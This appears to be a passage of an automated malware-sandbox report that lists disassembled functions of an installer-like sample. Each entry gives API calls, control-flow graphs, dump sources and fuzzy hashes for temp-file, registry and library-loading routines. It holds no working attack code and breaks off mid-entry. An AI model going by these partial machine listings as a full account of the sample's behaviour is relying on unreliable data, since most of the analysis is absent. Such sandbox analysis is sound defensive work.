                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DB9
                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00424200,?,00000000,?,?,?,00000000,?,?), ref: 00405FD2
                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                • lstrlenW.KERNEL32(Call,00424200,?,00000000,?,?,?,00000000,?,?), ref: 004060A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4187626192-1230650788
                                • Opcode ID: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction ID: 94fe74e46bfd99ff5e6600c27bcf33d7150fb5fb58e2d65541bf0035bd99d3a3
                                • Opcode Fuzzy Hash: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction Fuzzy Hash: 0F61E5312442159BDB20AB288D40A3B77A4EF58750F11443FF986F72D1DB7CD9219BAE
                                Function 0040291D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 595 40291d-402934 call 403002 598 402ea1-402ea5 595->598 599 40293a-40294b 595->599 603 402eab-402eb7 598->603 601 402951-402965 call 406c00 599->601 602 402aa2-402aac 599->602 601->602 608 40296b-402973 601->608 606 402ab5-402aba 602->606 609 402ad3-402ae2 SetFilePointer 606->609 610 402abc-402ac1 606->610 611 402975-40297a 608->611 609->602 612 402ac3-402ac6 610->612 613 402ac8-402ad1 610->613 614 402980-40299c ReadFile 611->614 615 402a33-402a37 611->615 612->609 612->613 613->602 614->602 616 4029a2-4029ac 614->616 617 402a39-402a3b 615->617 618 402a4c-402a5b call 406923 615->618 616->602 620 4029b2-4029bf 616->620 617->618 621 402a3d-402a46 call 40645f 617->621 618->602 627 402a5d-402a61 618->627 623 402ae4-402aee call 4065fa 620->623 624 4029c5-4029dc MultiByteToWideChar 620->624 621->602 633 402a48 621->633 623->598 623->603 624->627 628 4029de-4029e4 624->628 631 402a65-402a69 627->631 632 4029e6-4029f4 628->632 631->623 634 402a6b-402a76 631->634 632->631 635 4029f6-402a2f SetFilePointer MultiByteToWideChar 632->635 633->618 634->606 636 402a78-402a7d 634->636 635->632 637 402a31 635->637 636->606 638 402a7f-402a92 636->638 637->627 638->602 639 402a94-402a9c 638->639 639->602 639->611
                                APIs
                                • ReadFile.KERNELBASE(00000000,?,?,?), ref: 00402994
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$ByteCharMultiPointerWide$Read
                                • String ID: 9
                                • API String ID: 1439708474-2366072709
                                • Opcode ID: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                • Instruction ID: 06df5d1e4fd17f9c1e4dafe2560c0fdc737aa95be89056b4b35a237a27527231
                                • Opcode Fuzzy Hash: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                • Instruction Fuzzy Hash: 305139B1618341AFD724DF11CA44A2BB7E8BFD5304F00483FF985A62D0DBB9D9458B6A
                                Function 00406179 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 640 406179-406199 GetSystemDirectoryW 641 4061b3 640->641 642 40619b-40619d 640->642 644 4061b5 641->644 642->641 643 40619f-4061aa 642->643 643->644 645 4061ac-4061b1 643->645 646 4061ba-4061e7 wsprintfW LoadLibraryExW 644->646 645->646
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                • wsprintfW.USER32 ref: 004061CC
                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%S.dll$UXTHEME$\
                                • API String ID: 2200240437-1946221925
                                • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction ID: b03dfa9df8f17b5f94e80c11c2028c51dcc2a5658fc7e28beebe443f54a48520
                                • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction Fuzzy Hash: 07F0BB7150161457D710BB64DE0DB96366CEB00304F54447AA646F62C1EB7C9A54CB9C
                                Function 00406A31 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 647 406a31-406a3d 648 406a3e-406a70 GetTickCount GetTempFileNameW 647->648 649 406a72-406a74 648->649 650 406a7b 648->650 649->648 651 406a76-406a79 649->651 652 406a7d-406a80 650->652 651->652
                                APIs
                                • GetTickCount.KERNEL32 ref: 00406A4D
                                • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CAF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406A68
                                Strings
                                • a, xrefs: 00406A46
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3A
                                • n, xrefs: 00406A3F
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A36
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                • API String ID: 1716503409-3027303449
                                • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction ID: b372954d90286b94022032574b0bf3fdd655f2b9327b001c14c93946e7bfd4ef
                                • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction Fuzzy Hash: 1CF0BE72300208BBEB109F44DC09BDE7779EF81710F11C03BE941BB180E6B05A5487A4
                                Function 00403148 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 653 403148-403181 654 403190-4031a4 call 406923 653->654 655 403183-40318b call 403131 653->655 659 403354 654->659 660 4031aa-4031b0 654->660 655->654 661 403356 659->661 662 4032f6-4032f8 660->662 663 4031b6-4031dd GetTickCount call 407c4f 660->663 664 403357-403361 661->664 665 4032fa-4032fc 662->665 666 40333d-403352 call 40311b 662->666 669 4032ee-4032f0 663->669 674 4031e3-4031fa call 40311b 663->674 665->669 670 4032fe 665->670 666->659 666->669 669->664 673 403303-403313 call 40311b 670->673 673->659 679 403315-403325 call 4069e6 673->679 674->659 680 403200-40320e 674->680 686 403327-403335 679->686 687 403339-40333b 679->687 682 403218-403234 call 406e83 680->682 688 4032f2-4032f4 682->688 689 40323a-40325a GetTickCount 682->689 686->673 690 403337 686->690 687->661 688->661 691 4032a7-4032ad 689->691 692 40325c-403265 689->692 690->669 695 4032e6-4032e8 691->695 696 4032af-4032b1 691->696 693 403267-403269 692->693 694 40326b-4032a3 MulDiv wsprintfW call 405d15 692->694 693->691 693->694 694->691 695->669 695->674 698 4032b3-4032bc call 4069e6 696->698 699 4032cb-4032d3 696->699 703 4032c1-4032c3 698->703 702 4032d7-4032de 699->702 702->682 704 4032e4 702->704 703->687 705 4032c5-4032c9 703->705 704->669 705->702
                                APIs
                                • GetTickCount.KERNEL32 ref: 004031B6
                                • GetTickCount.KERNEL32 ref: 00403245
                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403275
                                • wsprintfW.USER32 ref: 00403286
                                  • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CountTick$FilePointerwsprintf
                                • String ID: ... %d%%
                                • API String ID: 999035486-2449383134
                                • Opcode ID: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                • Instruction ID: b14d6756c9ad048cc293c005f1ed80a68e2f1ec6eb458bfd39e289cb7134058b
                                • Opcode Fuzzy Hash: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                • Instruction Fuzzy Hash: CB516E716083429BD710AF269A85A2B7BD9AB84345F044A3FFC55E32D1DB38DA048B5E
                                Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 706 40141e-401456 call 4062b3 708 40145b-40145d 706->708 709 401463-40146d 708->709 710 401527-401530 708->710 711 401493-4014a4 709->711 712 40146f-401491 RegEnumValueW 709->712 714 4014ce-4014d6 RegEnumKeyW 711->714 712->711 713 401503-401512 RegCloseKey 712->713 713->710 715 4014a6-4014a8 714->715 716 4014d8-4014eb RegCloseKey call 4068c1 714->716 715->713 717 4014aa-4014c1 call 40141e 715->717 722 401514-40151e 716->722 723 4014ed-401501 RegDeleteKeyW 716->723 717->716 724 4014c3-4014cd 717->724 722->710 723->710 724->714
                                APIs
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                • RegCloseKey.ADVAPI32(?), ref: 00401507
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0
                                • Opcode ID: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                • Instruction ID: 4f1e1c459a9a950a7738efb8d65c2f41013d72b2fa1f43b4319387a01f4f2cce
                                • Opcode Fuzzy Hash: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                • Instruction Fuzzy Hash: FD216032108244BBD7219F51DD08FABBBADFF99354F01043EF989A11B0D7359A149A6A
                                Function 0040225D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 725 40225d-402268 726 40233e-402343 725->726 727 40226e-402289 call 40303e * 2 725->727 728 402345-40234a call 405d15 726->728 736 40228b-402296 GetModuleHandleW 727->736 737 40229c-4022aa LoadLibraryExW 727->737 735 402ea5-402eb7 728->735 739 4022b0-4022c2 call 406244 736->739 740 402298 736->740 737->739 741 402335-40233c 737->741 745 4022c4-4022ca 739->745 746 402306-40230c call 405d15 739->746 740->737 741->728 748 4022e6-402304 745->748 749 4022cc-4022e0 call 405d15 745->749 750 402311-402315 746->750 748->750 749->750 759 4022e2-4022e4 749->759 750->735 753 40231b-402323 call 403cb1 750->753 753->735 758 402329-402330 FreeLibrary 753->758 758->735 759->750
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,00001013,00000000,00000000), ref: 00405DDB
                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004022A0
                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                • String ID: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 334405425-204022868
                                • Opcode ID: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                • Instruction ID: a1346d69ca964d54404f15d64018e456dfdc0067b09238f3cf27b8b50b8900a8
                                • Opcode Fuzzy Hash: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                • Instruction Fuzzy Hash: 6021F832648301A7C711AF619E49A3F76A4AFD8721F60013FF951B12D0DBBC98029A5F
                                Function 00402656 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registrystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 760 402656-4026a8 call 40303e * 2 call 403023 call 406280 769 402ea5-402eb7 760->769 770 4026ae-4026b9 760->770 772 4026d1-4026d6 770->772 773 4026bb-4026cf call 40303e lstrlenW 770->773 774 4026e7-4026ec 772->774 775 4026d8-4026e5 call 403002 772->775 779 402700-40271a RegSetValueExW 773->779 774->779 780 4026ee-4026fe call 403148 774->780 775->779 784 40271c-402723 RegCloseKey 779->784 780->779 784->769
                                APIs
                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp,00000023,?,00000011,00000002), ref: 004026C3
                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp,?,?,00000011,00000002), ref: 00402710
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp,?,?,00000011,00000002), ref: 0040271D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseValuelstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp
                                • API String ID: 2655323295-3260894623
                                • Opcode ID: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                • Instruction ID: 31e5bc54edfcad7c1b31027c56fe611cf8d7432ac604a3e5fe606c4c5445a84e
                                • Opcode Fuzzy Hash: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                • Instruction Fuzzy Hash: 0F210032604300ABD7119FA0CD45A2FBBE8EB88760F10083EF540F31C0C7B99905879A
                                Function 004068C1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 786 4068c1-4068d7 GetModuleHandleA 787 4068e3-4068eb GetProcAddress 786->787 788 4068d9-4068da call 406179 786->788 789 4068f1-4068f3 787->789 791 4068df-4068e1 788->791 791->787 791->789
                                APIs
                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                • GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                  • Part of subcall function 00406179: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                  • Part of subcall function 00406179: wsprintfW.USER32 ref: 004061CC
                                  • Part of subcall function 00406179: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                • API String ID: 2547128583-890815371
                                • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction ID: 8df058e233f66e35bffb69da01c296363a0ab298929cdf7fbd230430fe9e2c9f
                                • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction Fuzzy Hash: BAD05B371022159BC7012F62AE0895F776DEF56351705443AF541F7270DB38D82295FD
                                Function 00406952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 792 406952-406985 call 4062b3 795 4069c4-4069c6 792->795 796 406987-4069b6 RegQueryValueExW RegCloseKey 792->796 797 4069c9-4069cb 795->797 796->795 798 4069b8-4069bc 796->798 798->797 799 4069be-4069c2 798->799 799->795 799->797
                                APIs
                                • RegQueryValueExW.KERNELBASE(?,00424200,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,00000002,00405F99), ref: 00406999
                                • RegCloseKey.KERNELBASE(?), ref: 004069A4
                                Strings
                                Memory Dump Source
